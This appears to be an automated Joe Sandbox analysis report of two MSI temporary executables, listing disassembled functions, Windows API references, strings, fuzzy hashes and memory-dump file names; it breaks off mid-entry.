Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
String ID: %.0Lf
API String ID: 1487807907-1402515088
Opcode ID: ce7f476dfd88893dc4b4772fdb7c8364515ea164219e6bfb1fcc27d2f0a07249
Instruction ID: 75942b6262c4879b5b422bd2b0b81b24652226beb85d48f9307599090a3d29e6
Opcode Fuzzy Hash: ce7f476dfd88893dc4b4772fdb7c8364515ea164219e6bfb1fcc27d2f0a07249
Instruction Fuzzy Hash: 00515B71D00209EBCF09DFE4D885AEDBBB9FF18300F20445AE506AB2A5EB399955CF50

Function 00199620 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON

Download Yara Rule

Strings

\\?\UNC\, xrefs: 001996F7, 00199752
\\?\, xrefs: 0019976E, 0019979B

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID:
String ID: \\?\$\\?\UNC\
API String ID: 0-3019864461
Opcode ID: 9d254da81583741c6f0fd0ad4fedd1f4515e4d891eecb886a3e0895bb8200454
Instruction ID: 16dc28c4be292c846505e18320b21030c200f45fe9533087564f9656f1547ae7
Opcode Fuzzy Hash: 9d254da81583741c6f0fd0ad4fedd1f4515e4d891eecb886a3e0895bb8200454
Instruction Fuzzy Hash: 0051C170A112049BDF18CFA9C895BBEBBB5FF98314F10451EE802B7681DB75A984CB94

Function 001BB5D1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 001BB5F6

Strings

RCC, xrefs: 001BB610
MOC, xrefs: 001BB608

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 5509ddae8190cb93e7248ded015a2cfdf61a005431ceeb30af0f5af989cc0727
Instruction ID: df764fd3eb6908aa80a2c8c7dbd2ec0be8db5afdefe2df9181a718d4ee1f7d02
Opcode Fuzzy Hash: 5509ddae8190cb93e7248ded015a2cfdf61a005431ceeb30af0f5af989cc0727
Instruction Fuzzy Hash: 22416772900209AFCF16DF98CD81AEEBBB5FF48304F188099FA04A7661D7B59D50DB50

Function 001B217C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001B2183

Part of subcall function 001A780A: __EH_prolog3.LIBCMT ref: 001A7811
Part of subcall function 001A780A: std::_Lockit::_Lockit.LIBCPMT ref: 001A781B
Part of subcall function 001A780A: std::_Lockit::~_Lockit.LIBCPMT ref: 001A788C

Strings

0123456789-, xrefs: 001B21D3
%.0Lf, xrefs: 001B21CE

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: %.0Lf$0123456789-
API String ID: 2728201062-3094241602
Opcode ID: 48331df93ff658a1554e22cfb9229019e9deaef28eb59e3671f477e7ee08b90e
Instruction ID: cffe3eddfab8e8d8485dd14ef8c7f446f72c924f440e89dddf3583f468bd32b8
Opcode Fuzzy Hash: 48331df93ff658a1554e22cfb9229019e9deaef28eb59e3671f477e7ee08b90e
Instruction Fuzzy Hash: 06417A35900219DFCF05EFE8C9919EEBBB5FF19310F14006AF811AB251DB349A5ACB95

Function 001B2460 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001B2467

Part of subcall function 0019B500: std::_Lockit::_Lockit.LIBCPMT ref: 0019B52D
Part of subcall function 0019B500: std::_Lockit::_Lockit.LIBCPMT ref: 0019B550
Part of subcall function 0019B500: std::_Lockit::~_Lockit.LIBCPMT ref: 0019B578
Part of subcall function 0019B500: std::_Lockit::~_Lockit.LIBCPMT ref: 0019B617

Strings

0123456789-, xrefs: 001B24B2
0123456789-, xrefs: 001B24B7

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
String ID: 0123456789-$0123456789-
API String ID: 2088892359-2494171821
Opcode ID: 58a478dccf1b27279cbe3e84b65b014030538bc13648958e8111b8e53d781578
Instruction ID: 7c5737ac72f734de5722b7d02324da908a5157f8f3d7e75122d982a4dbaa3039
Opcode Fuzzy Hash: 58a478dccf1b27279cbe3e84b65b014030538bc13648958e8111b8e53d781578
Instruction Fuzzy Hash: AF416931900219DFCF15EFE8D9919EEBBB5FF18310F10006AF805AB251DB309A5ACBA4

Function 001B64DB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001B64E2

Part of subcall function 0019C590: std::_Lockit::_Lockit.LIBCPMT ref: 0019C5BD
Part of subcall function 0019C590: std::_Lockit::_Lockit.LIBCPMT ref: 0019C5E0
Part of subcall function 0019C590: std::_Lockit::~_Lockit.LIBCPMT ref: 0019C608
Part of subcall function 0019C590: std::_Lockit::~_Lockit.LIBCPMT ref: 0019C6A7

Strings

0123456789-, xrefs: 001B652D
0123456789-, xrefs: 001B6532

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
String ID: 0123456789-$0123456789-
API String ID: 2088892359-2494171821
Opcode ID: a79ad8eca8c02c20cec1566c3afda550f1d17846afeccf9a1e0ca552288807e5
Instruction ID: 95de4c8ea8b7e8542e10448fcf499cbf73456fbbadf41c23ce7e981d9bb0f7e2
Opcode Fuzzy Hash: a79ad8eca8c02c20cec1566c3afda550f1d17846afeccf9a1e0ca552288807e5
Instruction Fuzzy Hash: 22416B31900209EFCF19EFA8D8919EEBBB6EF19310F10005AF411AB255DB34AE56CB91

Function 001B67B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001B67BC
__cftoe.LIBCMT ref: 001B684D

Strings

!%x, xrefs: 001B67D6

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: 19958a62dced671d5107f181888b9f50944a519193f3912f3d32c9ade0bc7128
Instruction ID: 4be8a7109a8922636207f2346216d578aafe6d354255392be4111128519bf755
Opcode Fuzzy Hash: 19958a62dced671d5107f181888b9f50944a519193f3912f3d32c9ade0bc7128
Instruction Fuzzy Hash: AA412674E11249EFDF05DFA8D881AEEBBB1BF28300F044429F955AB352D7349A05CB61

Function 001B2DB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001B2DBC
__cftoe.LIBCMT ref: 001B2E4F

Strings

!%x, xrefs: 001B2DCA

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: 38c2bc705d7f16e4fcd4c3b51f86c52fe055dc5e2d78fc06404ca744a55d648c
Instruction ID: bf68bf0b7a6d4aa637ca7dcac486c86f2865ce2c37f5f96f3774e940e1758337
Opcode Fuzzy Hash: 38c2bc705d7f16e4fcd4c3b51f86c52fe055dc5e2d78fc06404ca744a55d648c
Instruction Fuzzy Hash: 5E313875A00209EBDF05DFA4D981AEEB7B2FF58304F204429F905BB251E734AE15CB60

Function 0019D5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0019D682

Strings

%, xrefs: 0019D609
+, xrefs: 0019D5F6

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: _swprintf
String ID: %$+
API String ID: 589789837-2626897407
Opcode ID: 9010917e7b0918f8b0d48f864e94b7821ef5542e92f22a1fa36f7e338e9d2ffc
Instruction ID: 1225f00e8d086ea566428c9d37a6cce7c33a5a0d26cb32a2b004a8713afaa9da
Opcode Fuzzy Hash: 9010917e7b0918f8b0d48f864e94b7821ef5542e92f22a1fa36f7e338e9d2ffc
Instruction Fuzzy Hash: 6A2105711083449FDB11CF18D859B9BBBE9AF99304F04855DF99887282CB34D918C7A3

Function 0019D6C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0019D769

Strings

+, xrefs: 0019D6E6
%, xrefs: 0019D6F9

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: _swprintf
String ID: %$+
API String ID: 589789837-2626897407
Opcode ID: 36e37b56176fe47524778c5fd1ee18255591c804bd658439687a1772e6545f2c
Instruction ID: 322a5e0a262c93f9ff143c337636ed65ee41f7f78bca8f72afcfe15089e041cb
Opcode Fuzzy Hash: 36e37b56176fe47524778c5fd1ee18255591c804bd658439687a1772e6545f2c
Instruction Fuzzy Hash: B72106752083859FDB15CF58D845B9BBBE9EBC9304F04881DF99487292C734D908C7A7

Function 0019D7B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0019D859

Strings

+, xrefs: 0019D7D6
%, xrefs: 0019D7E9

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: _swprintf
String ID: %$+
API String ID: 589789837-2626897407
Opcode ID: 92bf5e78fae5d9ec47041299516b03f89e23dfec37e600757011c9d0bbf2440c
Instruction ID: 78bd3ca0cf9522153f247e71e9e91da62fdd7bf4ea040c0b9d8a6bef1e448724
Opcode Fuzzy Hash: 92bf5e78fae5d9ec47041299516b03f89e23dfec37e600757011c9d0bbf2440c
Instruction Fuzzy Hash: F821C4712083459FEB11CF18D845B9BBBE9EBD9300F04881DF99497292C734D919C7A6

Function 001980D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00198116
LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,08E011E3), ref: 00198185

Strings

Invalid SID, xrefs: 00198163

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ConvertFreeLocalString
String ID: Invalid SID
API String ID: 3201929900-130637731
Opcode ID: 8697ee2edc09f877abee64b5e25f91ea3b50f932b7f44ee3d5c8b1ade1760612
Instruction ID: 2f78b76e336c51881b3a8b74d4162cdd24d9c1e91c4ed8f72026591d3b9fe07b
Opcode Fuzzy Hash: 8697ee2edc09f877abee64b5e25f91ea3b50f932b7f44ee3d5c8b1ade1760612
Instruction Fuzzy Hash: 88218E74A003059BDB14DF58D819BBFFBB8FF85B04F10461EE812A7680DBB56A458BD0

Function 0019C140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0019C16B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0019C1CE

Strings

bad locale name, xrefs: 0019C1F1

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: 6a10fb5cce20310089e48bfb942706101920f578d4f88b2ed4a23931fd891f8c
Instruction ID: edb9bcff96f4f751d72f664154db13a78fa6205ddd7e0029ab11578da62aec8d
Opcode Fuzzy Hash: 6a10fb5cce20310089e48bfb942706101920f578d4f88b2ed4a23931fd891f8c
Instruction Fuzzy Hash: 4621F070809B84DED721CF68C90474BBFF4EF25310F10869EE09597B81D3B5AA04CBA1

Function 001A4077 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001A407E

Strings

false, xrefs: 001A40D5
true, xrefs: 001A40E8

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: H_prolog3_
String ID: false$true
API String ID: 2427045233-2658103896
Opcode ID: c04efa6193084524ccf1981de3f14294a3e45d45d9eeb0a32a323a2fbb318a47
Instruction ID: e281ad2f092aa2affc0f378611bf4979b3349faef249ed5f08b9a0d8f665219d
Opcode Fuzzy Hash: c04efa6193084524ccf1981de3f14294a3e45d45d9eeb0a32a323a2fbb318a47
Instruction Fuzzy Hash: 4A11E275D04745AFCB25EFB4D852B8ABBF4AF2A300F04852AF1A6DB651EB70E504CB50

Function 001A1E15 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 001A0B00: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,08E011E3,?,001D93B0,000000FF), ref: 001A0B27
Part of subcall function 001A0B00: GetLastError.KERNEL32(?,00000000,00000000,08E011E3,?,001D93B0,000000FF), ref: 001A0B31

IsDebuggerPresent.KERNEL32(?,?,001EFAD8), ref: 001A1E48
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,001EFAD8), ref: 001A1E57

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001A1E52

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: 37b7fe9b9f14f7b9a0bc0f3d1ffee4320988524bcc2204f7b0d7dfaff1f36de6
Instruction ID: e1709e56e6264b48095c7bad7bbea6753219c7714503340e7eed231ed30f012b
Opcode Fuzzy Hash: 37b7fe9b9f14f7b9a0bc0f3d1ffee4320988524bcc2204f7b0d7dfaff1f36de6
Instruction Fuzzy Hash: 70E092B46017119FC321AF39EA04746BBE4BF16744F408C1EE892D2B40EBB4E444CB61

Function 00196C20 Relevance: 5.2, APIs: 4, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,40000022,08E011E3,?,00000000,?,?,?,?,001D9DA0,000000FF,?,00196432,00000000,?), ref: 00196CC4
LocalAlloc.KERNEL32(00000040,3FFFFFFF,08E011E3,?,00000000,?,?,?,?,001D9DA0,000000FF,?,00196432,00000000,?), ref: 00196CE7
LocalFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,001D9DA0,000000FF,?,00196432,00000000), ref: 00196D87
LocalFree.KERNEL32(?,08E011E3,00000000,001D93B0,000000FF,?,00000000,00000000,001D9DA0,000000FF,08E011E3), ref: 00196E0D

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Local$AllocFree
String ID:
API String ID: 2012307162-0
Opcode ID: 80a38d5f380972f5c9461c6403639a8721d99e41de6add86c0be7c8919a8ed4c
Instruction ID: a65220851f23e1311b715f90281111cde24c676e590e6c08dcfd46512171eea8
Opcode Fuzzy Hash: 80a38d5f380972f5c9461c6403639a8721d99e41de6add86c0be7c8919a8ed4c
Instruction Fuzzy Hash: 9C51A7B5A002059FDB18DFA8D985BAEBBB5FB48310F14422DF825E7780D735AD40CBA4

Function 00194A80 Relevance: 5.2, APIs: 4, Instructions: 169memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,80000022,?,?,?,00000000,?,00000000,?,?), ref: 00194B05
LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,00000000,?,00000000,?,?), ref: 00194B25
LocalFree.KERNEL32(7FFFFFFE,?,?,00000000,?,00000000,?,?), ref: 00194BAB
LocalFree.KERNEL32(00000000,08E011E3,00000000,00000000,Function_000492C0,000000FF,?,?,00000000,?,00000000,?,?), ref: 00194C2D

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Local$AllocFree
String ID:
API String ID: 2012307162-0
Opcode ID: bab3196e4796d0db455deda55393a59651402f6479e8f3506c195bee97bdca67
Instruction ID: f6fb7a9285b996f78edb34aef35b8324d4b7fc1159034a8ec82aa1973cde2f21
Opcode Fuzzy Hash: bab3196e4796d0db455deda55393a59651402f6479e8f3506c195bee97bdca67
Instruction Fuzzy Hash: DF51C2726052159FCB14EF28DC81E6AB7E9FB88310F140A6EF866D7690DB30E9018B95

Analysis Process: MSI894F.tmpPID: 7508, Parent PID: 7292COMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.9%
Total number of Nodes:	1135
Total number of Limit Nodes:	18

Executed Functions

Function 00D465B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D46090: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00D460F4
Part of subcall function 00D46090: GetLastError.KERNEL32 ref: 00D46190

GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00D46632
NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00000000,?,00000000), ref: 00D4664E
ReadProcessMemory.KERNELBASE(00000000,?,?,000001D8,00000000,?,?,?,?,00000000), ref: 00D4668B
ReadProcessMemory.KERNELBASE(00000000,?,?,00000048,00000000,?,?,?,?,?,?,?,00000000), ref: 00D46712
ReadProcessMemory.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00D467F6
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00D4686E
GetLastError.KERNEL32(?,00000000), ref: 00D468C9
FreeLibrary.KERNEL32(?,?,00000000), ref: 00D4691E

Strings

NtQueryInformationProcess, xrefs: 00D4662C

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Process$MemoryRead$ErrorFreeLast$AddressDirectoryInformationLibraryLocalProcQuerySystem
String ID: NtQueryInformationProcess
API String ID: 3454136823-2781105232
Opcode ID: b17def454aa7a1d0af7610cc5842445e0a08b3d4fe8384d0243864d9f677956f
Instruction ID: 58702986c2ef529609385b485c1a320d18048f7faf0c634f8e66bc4eb0a27f63
Opcode Fuzzy Hash: b17def454aa7a1d0af7610cc5842445e0a08b3d4fe8384d0243864d9f677956f
Instruction Fuzzy Hash: 8CB17070D10749DBDB20CF64C9487AEBBF0EF49708F20465DE446A7690E7B5A6C8CBA1

Function 00D46EE0 Relevance: 46.0, APIs: 25, Strings: 1, Instructions: 519
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D45F90: GetCurrentProcess.KERNEL32(00000008,?,7EBC463A), ref: 00D45FA0
Part of subcall function 00D45F90: OpenProcessToken.ADVAPI32(00000000), ref: 00D45FA7

CoInitialize.OLE32(00000000), ref: 00D46F55
CoCreateInstance.OLE32(00D8D310,00000000,00000004,00D9B320,00000000,?), ref: 00D46F85
CoUninitialize.OLE32 ref: 00D474F6
_com_issue_error.COMSUPP ref: 00D47524

Part of subcall function 00D41910: LocalFree.KERNEL32(?,7EBC463A,?,00000000,00D892C0,000000FF,?,?,00DA1348,?,00D41E3E,8007000E), ref: 00D4195C

Strings

$, xrefs: 00D47454

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

